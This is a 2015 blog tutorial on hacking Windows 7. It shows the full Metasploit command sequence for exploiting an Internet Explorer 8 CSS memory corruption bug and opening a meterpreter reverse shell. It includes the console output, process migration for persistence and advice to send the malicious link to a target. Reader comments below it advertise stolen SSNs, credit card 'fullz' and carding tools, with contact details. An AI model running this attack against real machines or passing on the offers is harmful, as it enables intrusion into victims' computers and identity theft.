Sunday, 21 June 2015

Hack Windows 7 by using Kali Linux


In this tutorial, we will exploit "Internet Explorer CSS recursive call memory corrruption" vulnerability in Internet Explorer 8 in Windows 7 Service Pack 1 (unpatched) using Metasploit in Kali Linux and get a remote shell on the Windows 7 machine.

We have the  following configuration: Windows 7 IP Address: 192.168.122.10
Kali Linux IP Address: 192.168.122.115

Perform the following steps on the Kali Linux Machine

1) Start the services.
root@kali:~# service postgresql start
[ ok ] Starting PostgreSQL 9.1 database server: main.

root@kali:~# service metasploit start
[ ok ] Starting Metasploit rpc server: prosvc.[ ok ] Starting Metasploit web server: thin.
[ ok ] Starting Metasploit worker: worker.


2) Start metasploit console.
root@kali:~# msfconsole
msf >

3) Select exploit.
msf > use exploit/windows/browser/ms11_003_ie_css_import

4) Select payload. 
msf exploit(ms11_003_ie_css_import) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp


5) View options.
msf exploit(ms11_003_ie_css_import) > show options

Module options (exploit/windows/browser/ms11_003_ie_css_import):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   OBFUSCATE  true             no        Enable JavaScript obfuscation
   SRVHOST    0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT    8080             yes       The local port to listen on.

   SSL        false            no        Negotiate SSL for incoming connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                     no        The URI to use for this exploit (default is random)

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (accepted: seh, thread, process, none)
   LHOST                      yes       The listen address
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic


6) Set options
msf exploit(ms11_003_ie_css_import) > set URIPATH /
URIPATH => /
msf exploit(ms11_003_ie_css_import) > set LHOST 192.168.122.115
LHOST => 192.168.122.115

7) Execute the exploit.
msf exploit(ms11_003_ie_css_import) > exploit
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.122.115:4444
msf exploit(ms11_003_ie_css_import) > [*] Using URL: http://0.0.0.0:8080/
[*]  Local IP: http://192.168.122.115:8080/
[*] Server started.


8) User clicks on the malicious URL. As we can see, a link has been generated as a result of the exploit command. This is the malicious link http://192.168.122.115:8080/ that we will have to send to our target, so that it can exploit their browser.

When the user clicks on the malicious link, the browser will try to load the page, but nothing will be displayed. But you will get a remote shell on your msfconsole, as shown below.

[*] 192.168.122.10   ms11_003_ie_css_import - Received request for "/"
[*] 192.168.122.10   ms11_003_ie_css_import - Sending redirect
[*] 192.168.122.10   ms11_003_ie_css_import - Received request for "/iPKMV.html"
[*] 192.168.122.10   ms11_003_ie_css_import - Sending HTML
[*] 192.168.122.10   ms11_003_ie_css_import - Received request for "/generic-1434889455.dll"
[*] 192.168.122.10   ms11_003_ie_css_import - Sending .NET DLL
[*] 192.168.122.10   ms11_003_ie_css_import - Received request for "/favicon.ico"
[*] 192.168.122.10   ms11_003_ie_css_import - Sending CSS
[*] 192.168.122.10   ms11_003_ie_css_import - Received request for "/\xEE\x80\xA0\xE1\x81\x9A\xEE\x80\xA0\xE1\x81\x9A\xEE\x80\xA0\xE1\x81\x9A\xEE\x80\xA0\xE1\x81\x9A"
[*] 192.168.122.10   ms11_003_ie_css_import - Sending CSS
[*] Sending stage (770048 bytes) to 192.168.122.10
[*] Session ID 1 (192.168.122.115:4444 -> 192.168.122.10:49219) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (2744)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3376
[*] 192.168.122.10   ms11_003_ie_css_import - Received request for "/generic-1434889455.dll"
[*] 192.168.122.10   ms11_003_ie_css_import - Sending .NET DLL
[*] Sending stage (770048 bytes) to 192.168.122.10
[*] 192.168.122.10   ms11_003_ie_css_import - Received request for "/favicon.ico"
[*] 192.168.122.10   ms11_003_ie_css_import - Sending CSS
[+] Successfully migrated to process
[*] Session ID 2 (192.168.122.115:4444 -> 192.168.122.10:49221) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (3404)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3532
[*] 192.168.122.10   ms11_003_ie_css_import - Received request for "/generic-1434889455.dll"
[*] 192.168.122.10   ms11_003_ie_css_import - Sending .NET DLL
[*] Sending stage (770048 bytes) to 192.168.122.10
[+] Successfully migrated to process
[*] Session ID 3 (192.168.122.115:4444 -> 192.168.122.10:49224) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (3664)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3808
[*] 192.168.122.10   ms11_003_ie_css_import - Received request for "/generic-1434889455.dll"
[*] 192.168.122.10   ms11_003_ie_css_import - Sending .NET DLL
[*] Sending stage (770048 bytes) to 192.168.122.10
[+] Successfully migrated to process
[*] Session ID 4 (192.168.122.115:4444 -> 192.168.122.10:49226) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (3848)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3984
[+] Successfully migrated to process

As we can see above, the InitialAutoRunScript executes a migrate -f command which migrates the payload from iexplorer.exe to notepad.exe. This step is essential for a persistent connectivity. Even if the user closes the browser, still the conection will be alive as we have migrated to another process.

9) View the sessions.
msf exploit(ms11_003_ie_css_import) > sessions -i

Active sessions
===============

  Id  Type                   Information                  Connection
  --  ----                   -----------                  ----------
  1   meterpreter x86/win32  shabbir-PC\ali @ SHABBIR-PC  192.168.122.115:4444 -> 192.168.122.10:49219 (192.168.122.10)
  2   meterpreter x86/win32  shabbir-PC\ali @ SHABBIR-PC  192.168.122.115:4444 -> 192.168.122.10:49221 (192.168.122.10)
  3   meterpreter x86/win32  shabbir-PC\ali @ SHABBIR-PC  192.168.122.115:4444 -> 192.168.122.10:49224 (192.168.122.10)
  4   meterpreter x86/win32  shabbir-PC\ali @ SHABBIR-PC  192.168.122.115:4444 -> 192.168.122.10:49226 (192.168.122.10)


10) Connect to the remote machine.
msf exploit(ms11_003_ie_css_import) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : SHABBIR-PC
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32

meterpreter > getuid
Server username: shabbir-PC\ali

meterpreter > shell
Process 2704 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Users\ali\Desktop>

7 comments:

  1. I sent that link through mail
    after switching to my windows i opened browser and made click on that link
    new tab open's and showing
    The site can't be reached error
    What could be a problem

    ReplyDelete
  2. Hey Guys !

    USA Fresh & Verified SSN Leads along with Driving License/ ID Number, AVAILABLE with 99.9% connectivity
    All Leads have genuine & valid information.

    **DETAILS IN LEADS**
    First Name | Last Name | SSN | Dob | Driving License Number | Address | City | State | Zip | Phone Number | Account Number | Payday | Bank Name | Employee Details | IP Address

    *Price for SSN lead $2
    *You can ask for sample before any deal
    *If anyone buy in bulk, we can negotiate
    *Sampling is just for serious buyers

    ==>ACTIVE, FRESH CC & CVV FULLZ AVAILABLE<==
    ->$5 PER EACH

    ->Hope for the long term Business
    ->Interested buyers will be welcome

    **Contact 24/7**
    Whatsapp > +923172721122
    Email > leads.sellers1212@gmail.com
    Telegram > @leadsupplier
    ICQ > 752822040

    ReplyDelete
  3. We will be getting a reverse TCP connection from the victim machine by using a small backdoor hack windows 7 using metasploit.

    ReplyDelete
  4. Hi Guy's

    Fresh & valid spammed USA SSN+Dob Leads with DL available in bulk.

    >>1$ each SSN+DOB
    >>3$ each with SSN+DOB+DL
    >>5$ each for premium fullz (700+ credit score with replacement guarantee)

    Prices are negotiable in bulk order
    Serious buyer contact me no time wasters please
    Bulk order will be preferable

    CONTACT
    Telegram > @leadsupplier
    ICQ > 752822040
    Email > leads.sellers1212@gmail.com

    OTHER STUFF YOU CAN GET

    SSN+DOB Fullz
    CC's with CVV's (vbv & non-vbv)
    USA Photo ID'S (Front & back)

    All type of tutorials available
    (Carding, spamming, hacking, scam page, Cash outs, dumps cash outs)

    SMTP Linux Root
    DUMPS with pins track 1 and 2
    WU & Bank transfers
    Socks, rdp's, vpn
    Php mailer
    Sql injector
    Bitcoin cracker
    Server I.P's
    HQ Emails with passwords
    All types of tools & tutorials.. & much more

    Looking for long term business
    For trust full vendor, feel free to contact

    CONTACT
    Telegram > @leadsupplier
    ICQ > 752822040
    Email > leads.sellers1212@gmail.com

    ReplyDelete